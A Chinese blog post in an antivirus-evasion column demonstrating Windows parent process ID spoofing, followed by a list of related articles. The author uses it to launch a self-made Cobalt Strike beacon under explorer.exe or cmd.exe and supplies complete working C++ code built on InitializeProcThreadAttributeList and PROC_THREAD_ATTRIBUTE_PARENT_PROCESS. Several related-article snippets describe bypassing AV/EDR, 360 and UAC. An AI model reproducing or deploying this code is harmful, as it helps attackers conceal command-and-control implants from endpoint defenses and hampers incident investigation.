父进程隐藏——ConsoleApplication903项目

最新推荐文章于 2024-01-29 11:49:29 发布
最新推荐文章于 2024-01-29 11:49:29 发布
阅读量333 收藏
点赞数
分类专栏: 免杀 文章标签: 网络安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/134680287
版权
本文介绍了一种使用C++编写的代码,通过GetProcessIDFromName函数获取进程PID,然后利用InitializeProcThreadAttributeList等API伪造父进程,实现进程隐藏,以explorer.exe为例进行演示。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
首先我发现用calc来做进程隐藏实验是失败的,父进程一直都是svhost.exe

那么我用我自己生成的cs木马beacon903.exe试试
试试explorer.exe
在这里插入图片描述
在这里插入图片描述
再试试cmd.exe
在这里插入图片描述
在这里插入图片描述
可以看到成功变成cmd.exe
可以看到我们可以通过这种方式虚假父进程
以上我们是直接获得的pid,那么我们将他修改成通过进程名去获得对应pid
在这里插入图片描述
在这里插入图片描述
可以看到成功上线
给出全部代码

#include <Windows.h>
#include <intrin.h>
#include <stdio.h>
#include <iostream>
#include <tchar.h>

#include <TlHelp32.h>

DWORD GetProcessIDFromName(LPCWSTR name)
{
	PROCESSENTRY32 pe32;
	pe32.dwSize = sizeof(pe32);

	HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcessSnap == INVALID_HANDLE_VALUE) {
		printf("CreateToolhelp32Snapshot Error!");
		return false;
	}

	BOOL bResult = Process32First(hProcessSnap, &pe32);

	int num(0);

	while (bResult)
	{
		if (_wcsicmp(pe32.szExeFile, name) == 0)
		{
			return pe32.th32ProcessID;
		}

		bResult = Process32Next(hProcessSnap, &pe32);
	}

	CloseHandle(hProcessSnap);

	return 0;


}

int _tmain(int argc, _TCHAR* argv[])
{
	//CHAR* lpExePath = (CHAR *)"c:\\windows\\system32\\calc.exe";
	CHAR* lpExePath = (CHAR*)"C:\\Users\\qiezi\\Desktop\\beacon903.exe";
	LPCWSTR targetProcessName = L"explorer.exe";

	/* 根据进程名获取任意进程Id */
	DWORD  pid = GetProcessIDFromName(targetProcessName);//遍历进程快照获取进程ID  targetProcessName
	//DWORD  pid = 17756;

	if (pid == 0)
	{
		printf("Can't find process pid!\n");
		return false;
	}

	HANDLE handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

	/* 创建启动信息结构体 */
	STARTUPINFOEXA si;

	/* 初始化结构体 */
	ZeroMemory(&si, sizeof(si));

	/* 设置结构体成员 */
	si.StartupInfo.cb = sizeof(si);

	SIZE_T lpsize = 0;

	/* 用微软规定的特定的函数初始化结构体 */
	InitializeProcThreadAttributeList(NULL, 1, 0, &lpsize);

	/* 转换指针到正确类型 */
	char* temp = new char[lpsize];
	LPPROC_THREAD_ATTRIBUTE_LIST AttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)temp;

	/* 真正为结构体初始化属性参数 */
	InitializeProcThreadAttributeList(AttributeList, 1, 0, &lpsize);

	/* 用已构造的属性结构体更新属性表 */
	if (!UpdateProcThreadAttribute(AttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &handle, sizeof(HANDLE), NULL, NULL))
	{
		printf("%s", "Fail to update attributes");
		return 0;
	}

	si.lpAttributeList = AttributeList;

	PROCESS_INFORMATION pi;
	ZeroMemory(&pi, sizeof(pi));
	CreateProcessAsUserA(NULL, 0, lpExePath, 0, 0, 0, EXTENDED_STARTUPINFO_PRESENT, 0, 0, (LPSTARTUPINFOA)&si, &pi);


	DeleteProcThreadAttributeList(AttributeList);
	delete temp;


	return 0;
}

在这里插入图片描述
代码主要实现部分为上面红框内,伪造父进程最重要的一个 api 就是 InitializeProcThreadAttributeList,另外还有个重要的结构体 STARTUPINFOEXA

参考文章:
父进程伪造细节——https://www.wangan.com/p/7fygfy13b72f6be2

Spring Boot 完整讲解
可乐的博客
02-28 2万+
SpringBoot学习笔记 文章写得比较详细,所以很长(105336 字数),可以参考目录 文章目录SpringBoot学习笔记@[toc]一、 Spring Boot 入门预:必须掌握的技术:1. Spring Boot 简介背景解决的问题优点缺点2.微服务What are Microservices?单体应用微服务3.环境准备Maven设置:Idea设置4.Spring Boot Hel...
JavaEE知识体系
热门推荐
yuh2012的博客
07-11 2万+
1 1.文件上传下载 1.1 文件上传 1.1.1 文件上传的作用 例如网络硬盘!就是用来上传下载文件的。 在智联招聘上填写一个完整的简历还需要上传照片呢。 1.1.2 文件上传对页面的要求 1.必须使用表单,而不能是超链接; 2.表单的method必须是POST,而不能是GET; 3.表单的enctype必须是multipart/form-data; 4.在表单中添加file表
红队技术-父进程伪装(MITRE ATT&CK框架:T1134)
蚁景网安学院
04-21 3759
父PID(PPID)伪装方法可以绕过 AV/EDR检测,使其认为是 lsass.exe 这样的合法进程在进行活动。它通过伪装进程的 PID 以匹配其父进程的 PID 来做到这一点。这种方法可能带来的另一个好处是,如果父进程以 SYSTEM 权限运行,则可以凭借访问令牌的继承,使其子进程也具有相同的 SYSTEM 权限。
进程的深度隐藏
diegu9287的博客
09-29 197
/********************************************************* 查找进程操作系统最终调用native api ZwQuerySystemInformation, 因此拦截此函数可以达到隐藏进程的目的。 *********************************************************/ /...
伪造父进程的另一种方式
Sven的忘却日记
10-31 1841
创建任意进程,父进程为explorer.exe #include "stdafx.h" #include <windows.h> #include <shlwapi.h> #include <shlobj.h> #pragma comment(lib, "shlwapi.lib") // use the shell view for the desktop...
explorer的父进程
09-30 899
explore的父进程
Windows 父进程欺骗技术
linlin003的专栏
09-29 2096
Windows 父进程欺骗技术,其实就是创建一个进程,指定其他进程为这个新创建进程的父进程。 通过CreateProcessA进行欺骗 对父进程进行欺骗有许多方法,本文中着重介绍通过调用CreateProcessA函数进行实现,该方法最简单也最常用。 CreateProcessA函数允许用户创建新进程,默认情况下,会通过其继承的父进程完成创建。该函数有一个名为“lpStartupInfo”的参数,该参数允许使用者自定义要使用的父进程。该功能最初用于Windows Vista中设置UAC。 lpStar
前端基础知识和一些面试题(一)
m0_71003185的博客
10-02 809
前端常见基础知识
Java Web应用实践
muzihao6的博客
03-14 1502
《JAVA WEB应用实践》 第一章 、JSP的认识 1、Tomcat7 的目录结构: 目录 说明 /bin 存放用于启动和停止Tomcat的脚本文件 /conf 存放Tomcat服务器的各种配置文件,最重要的是service.xml文件 /lib 存放Tomcat服务器需要的各种jar文件,驱动包 /logs 存放Tomcat的日志文件 /temp 存放Tomca...
前端知识宝典
最新发布
qq_37759901的博客
01-29 1504
搜索框输入,文本剪辑器实时保存代码实现思路如下:(利用定时器,每次触发先清掉以前的定时器,从新开始)
父进程欺骗
qq_41252520的博客
04-25 3072
3.1.简介 父进程欺骗技术是说,把一个恶意进程的 PID指定为一个合法的进程(lsass.exe)的 PID。 安全软件会通过对父子进程间关系的检测来判断该进程是否异常,攻击者以此技术规避启发式检测等防御手段。 3.2.原理 父进程欺骗用的最多的方法就是通过CreateProcess\textcolor{cornflowerblue}{CreateProcess}CreateProcess函数实现,其原型如下: BOOL WINAPI CreateProcessA( _In_opt_ LPCS
修改目标进程的父进程
Richard的专栏
03-10 7583
 来源:http://pjf.blogone.net作者:pjf(jfpan20000@sina.com)  让小师弟测一下1.06的进程规则,他试了试问:“为什么里面有源进程和父进程两项?不就是指创建目标进程的那个进程,它们不是一个意思吗?”  因为很简单,略略回答了一下,因为好多天没在http://pjf.blogone.net上添东西了,敲下来充数,有点不好意思。   windows下的
关于父进程和子进程的关系(UAC 绕过思路)
weixin_34288121的博客
04-14 980
      表面上看。在windows中。假设是a进程创建了b进程,那么a进程就是b进程的父进程。反之,假设是b创建了a,那么b进程就是a的父进程,这是在windows出现以来一直是程序员们都证实的,可是在在win Vista后面有了一个新安全消息机制。UAC(user account control),这里科普下UAC的功能,事实上UAC就是大家常见的安装软件或者启动程序的时候的出现的全...
创建进程时指定父进程
Sven的忘却日记
04-29 3559
创建进程时为创建的进程指定父进程,可以用来破坏进程链,加大溯源难度,而且用procmon也抓不到日志 #include "stdafx.h" #include "windows.h" #include <intrin.h> #include <TlHelp32.h> DWORD GetProcessIDFromName(WCHAR * name) { PROCESS...
2014简单绕过某60父进程查杀
落笔飞花笑百生的博客
04-27 1890
 ;落笔飞花笑百生 ;2014.12.9 ;过360父进程一个弱弱的方法 ;过360启动项 .386 .model flat,stdcall option casemap:none include windows.inc includelib kernel32.lib include kernel32.inc include user32.inc include
进程伪装代码
yan_star的博客
03-13 2667
// DisguiseProcess.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include "DisguiseProcess.h" int _tmain(int argc, _TCHAR* argv[]) { if (FALSE == DisguiseProcess(9540, L"C:\\Windows\\explorer.exe"...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值